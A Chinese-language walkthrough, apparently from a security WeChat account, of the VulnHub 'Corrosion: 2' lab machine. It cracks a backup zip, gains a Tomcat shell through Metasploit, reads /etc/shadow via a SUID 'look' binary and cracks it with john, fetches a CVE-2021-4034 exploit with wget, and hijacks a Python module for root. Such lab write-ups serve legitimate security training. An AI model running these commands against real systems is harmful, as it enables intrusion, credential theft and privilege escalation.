下载地址:https://www.vulnhub.com/entry/corrosion-2,745/
选择镜像文件进行下载。下载后解压是一个ovf文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。
文件名:Corrosion2.ova文件大小:5.1 GBMD5:CFE23EC5FFE4359AFE34A13C4006451ESHA1:80B39AD58F786F205E6ECACFF6C734B02204E006
vim命令无法使用,需要使用nano命令进行文件编辑。
获取root权限,共有两个flag。
randy用户-user.txt:ca73a018ae6908a7d0ea5d1c269ba4b6root用户-root.txt:2fdbf8d4f894292361d6c72c8e833a4b
确定IP地址、端口扫描、网站访问、目录扫描、爆破压缩包密码、发现后台登录账密。
使用nmap确定该靶场IP地址,地址为:192.168.241.175。
namp -sP 192.168.241.0/24
使用nmap进行端口扫描,发现其开放22、80和8080端口。
22端口开放SSH服务,OpenSSH 8.2p1;80端口开放http服务,Apache Httpd 2.4.41;8080端口开放Tomcat服务,Apache Tomcat 9.0.53。
nmap -sV -v -T4 -A -p- 192.168.241.175
访问80端口,发现是Apache2 Ubuntu默认页面。
http://192.168.241.175
访问8080端口,发现是Tomcat页面。
http://192.168.241.175:8080
扫描80端口,只有一个index.html页面,并未发现其他可用信息。
dirsearch -u http://192.168.241.175
扫描8080端口,发现一些Tomcat目录结构,还有backup.zip压缩包和readme.txt文本。
dirsearch -u http://192.168.241.175:8080
查看readme.txt文本内容,提示服务器上有了一个文件,且使用已给出的密码。
下载backup.zip压缩包。发现需要输入密码才能访问。
将该文件传入kali Linux,使用zip密码爆破工具fcrackzip进行密码爆破。
对压缩包进行密码爆破,得到密码为@administrator_hi5
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
创建一个backup文件夹,将压缩包移动到该文件夹内,进行解压。
mkdir backupmv backup.zip backupcd backuplsunzip backup.zip输入密码:@administrator_hi5ls -l
在tomcat-users.xml文件里发现tomcat后台的用户名和密码。
manager:melehifokivaiadmin:melehifokivai
登录Tomcat后台、MSF攻击、创建伪终端、查阅靶机用户信息、获得第一个flag、查看可执行权限文件、下载导入CVE-2021-4034.py、SSH远程连接、查看用户目录信息、保存用户信息、爆破用户密码、randy用户连接登录、查阅base64文件。
MSF中有一个可根据账号和密码获取Tomcat shell权限的exp。
search tomcat # 搜索 Metasploit 框架中可用的与 Tomcat 相关的漏洞模块use7 # 选择第 7 个搜索结果(exploit/multi/http/tomcat_mgr_upload),作用是通过 Tomcat 管理界面上传 war 包,从而获取远程代码执行权限。set HttpUsername admin # 设置目标 Tomcat 的管理用户名为 adminset HttpPassword melehifokivai # 设置目标 Tomcat 的管理密码(用于身份认证)set RHORT 192.168.241.175 # 设置远程目标主机的 IP 地址set RpORT 8080 # 设置目标 Tomcat 的端口show options # 显示当前模块的所有配置选项,确认是否都设置正确run # 执行该模块shell #进入当前会话id #查看当前shell所拥有的用户权限
通过python启动一个/bin/bash的伪终端。
python3 -c "import pty;pty.spawn('/bin/bash')"
经过查阅,发现两个用户jaye和randy,在randy用户下发现note.txt信息。
该文件提示会对该用户主目录的权限更改,无法进行删除或添加文件。
该文件进行查阅,发现user.txt文件输出一串乱码。
在randy用户下发现user.txt。
user.txt:ca73a018ae6908a7d0ea5d1c269ba4b6
find / -perm -u=s -type f 2>/dev/null在最后一行,发现policykit-1/polkit-agent-helper-1,可以使用经典的本地提权漏洞cve-2021-4034。
且靶机有python程序。
https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.pypython -m http.server 10001wget http://192.168.241.1:10001/CVE-2021-4034.py
下载导入靶机。
导入失败了……没有权限……因为系统已对randy用户目录的权限进行更改,无法进行删除和添加。
使用jaye用户进行SSH连接。密码使用刚才获取的密码。
ssh jaye@192.168.241.175密码为melehifokivai
通过python启动一个/bin/bash的伪终端。
python3 -c "import pty;pty.spawn('/bin/bash')"查看jaye用户目录下的文件信息。
在Files文件夹发现look命令。
look 命令是 Linux/Unix 中一个非常实用的小工具,用于从字典文件或文本文件中查找以某个字符串开头的单词或行。
cat命令查看失败,使用file命令进行查阅,发现look可以越权访问。
查阅/etc/shadow和/etc/passwd内容,将文件内容保存到kali linux。
./look '' /etc/passwd./look '' /etc/shadow
先生成一个密码本。
unshadow passwd.txt shadow.txt > password.txt
使用john工具进行爆破
john --wordlist=/usr/share/wordlists/rockyou.txt password.txt经过长达几个小时的破解,终于得到用户名和密码。
jayemelehifokivairandy07051986randy
ssh randy@192.168.241.175
使用命令sudo -l查看可以执行的root权限的命令。
发现/usr/bin/python3.8 /home/randy/randombase64.py。
查看randombase64.py文件。发现该文件调用了base64模块。但因为没有修改权限,无法对该文件内容进行调整。
发现该文件具有可读可写可执行权限。我们可以将脚本写入该文件。
在base64.py文件中写入shell、获得root权限、获得第二个flag。
在写入脚本时,靶机无法使用vim命令,只能采用nano来编辑py文件,写入以下内容:
import osos.system("/bin/bash")
按Ctrl + O,随后按回车,保存该文件。
按Ctrl + X,退出文件编辑。
使用cat命令查阅该文件,shell写入成功。
运行randombase64.py文件。获得root权限。
sudo /usr/bin/python3.8 /home/randy/randombase64.py1id
在root用户目录下,发现第二个flag。
root.txt:2fdbf8d4f894292361d6c72c8e833a4b
下载CVE-2021-4034.py,执行该文件,即可获得root权限。
按照3.2.7步骤重新下载该程序,在jaye用户目录下下载成功。
wget http://192.168.241.1:10001/CVE-2021-4034.py
执行该文件,获得root权限。
python3 CVE-2021-4034.py
免责声明
本公众号“暗魂攻防实验室”致力于分享网络安全相关知识及资讯,所有内容仅供学习和交流使用,不得用于任何非法用途。由于传播、利用本公众号“暗魂攻防实验室”所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任!!!
以下为本公众号声明内容,请知悉并遵守:
1.关于信息的准确性
本公众号所发布的信息均来源于公开渠道或作者整理,仅供参考,不保证内容的绝对准确性、完整性和时效性。使用者在依赖相关内容前,应独立核实信息的真实性和适用性。
2.法律与合规性
使用者应严格遵守国家相关法律法规,确保所有操作仅用于合法用途。本公众号明确禁止任何利用内容进行非法活动的行为,由此产生的后果由使用者自行承担,本公众号及作者不承担任何责任。
3.版权声明
本公众号部分内容如引用了他人作品或资源,均已标注来源或作者。如有侵权,请及时联系我们,我们将在核实后立即删除并致以歉意。
4.合法用途限制
本公众号内容仅供参考,任何利用本公众号内容从事违法行为的后果均由使用者自行承担,本公众号及作者对此不承担任何责任。
5.风险告知
因使用或传播本公众号内容导致的直接或间接后果(如系统损坏、数据丢失、法律责任等),均由使用者自行承担。本公众号及作者对此不承担任何责任。
原文始发于微信公众号(暗魂攻防实验室):【渗透测试】Corrosion: 2靶场渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论